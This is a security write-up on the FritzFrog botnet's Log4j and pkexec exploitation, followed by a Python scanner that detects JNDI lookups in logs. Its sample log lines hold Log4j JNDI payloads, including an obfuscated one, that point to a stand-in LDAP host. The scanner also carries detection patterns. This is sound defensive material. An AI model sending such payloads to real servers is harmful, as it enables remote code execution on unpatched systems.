On February 1, 2024, the Akamai Security Intelligence Group (SIG) reported that a variant of the FritzFrog botnet has been observed actively exploiting "Log4j" (CVE-2021-44228) as part of its attack chain. The campaign targets unpatched instances, of which many likely remain across organizations.
Akamai's analysis highlights that the FritzFrog botnet has expanded its capabilities with the following new features:
FritzFrog carries out SSH brute-force attacks against weak credentials for initial intrusion. The malware ships a variety of modules configured to target a large set of Java applications, including a dedicated module that exploits Log4j on vulnerable instances. The malware scans for HTTP servers on ports 8080, 8090, 8888 and 9000, then triggers the vulnerability by getting a crafted payload logged, which in turn forces the Java application to connect to an attacker-controlled LDAP server, from which a malicious Java class is downloaded and executed.
Notably, a separate module targets CVE-2021-4034, a local privilege escalation in polkit's pkexec utility.
Ability to kill competing malware.
FritzFrog implements a number of measures that reduce its attack footprint, in particular avoiding dropping files to the local drive: the malware uses /dev/shm and memfd_create to execute its payload from memory without ever writing it to disk.
Network communication over TOR.
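The JNDI lookup that the Log4j module described above relies on ends up in whatever field the application logs, so it can be hunted for in access or application logs. The following Python scanner is an added example, not code from Akamai or from the report: it flags log lines carrying a `${jndi:...}` lookup and goes beyond the text by first collapsing the nested `${lower:}`, `${upper:}` and `${...:-default}` lookups that Log4j 2 evaluates before the outer one, so split-up variants are caught as well. The sample log lines and the 203.0.113.10 address are constructed.

```python
import re

# Constructed sample access-log lines (not from the Akamai report): a benign request,
# a plain JNDI lookup in the User-Agent, and one whose lookup is hidden behind nested
# ${lower:}, ${upper:} and ${::-default} lookups that Log4j 2 resolves first.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Feb/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Feb/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [01/Feb/2024:10:00:03 +0000] "GET /?x=${${lower:j}${upper:n}di:${::-l}dap://203.0.113.10/b} HTTP/1.1" 404 0 "-" "curl/8.0"',
]

# An innermost ${...} lookup: nothing nested inside the braces.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup using one of the protocol handlers reachable through Log4j 2's JNDI lookup.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def _resolve_inner(match):
    """Evaluate one innermost lookup the way Log4j 2 would, or leave it untouched."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    # "${prefix:key:-default}" falls back to the default when the key is unresolvable;
    # assuming no such env/sys key exists yields the string the sender intended.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)  # e.g. "${jndi:...}" itself stays for the final check


def normalize_lookups(text, max_rounds=20):
    """Collapse nested lookups from the inside out until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(_resolve_inner, text)
        if new == text:
            break
        text = new
    return text


def scan_logs(lines):
    """Return (line index, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((i, norm))
    return hits
```

Running `scan_logs(SAMPLE_LOGS)` reports lines 1 and 2, with the obfuscated one shown in its collapsed form so an analyst can read the intended lookup directly.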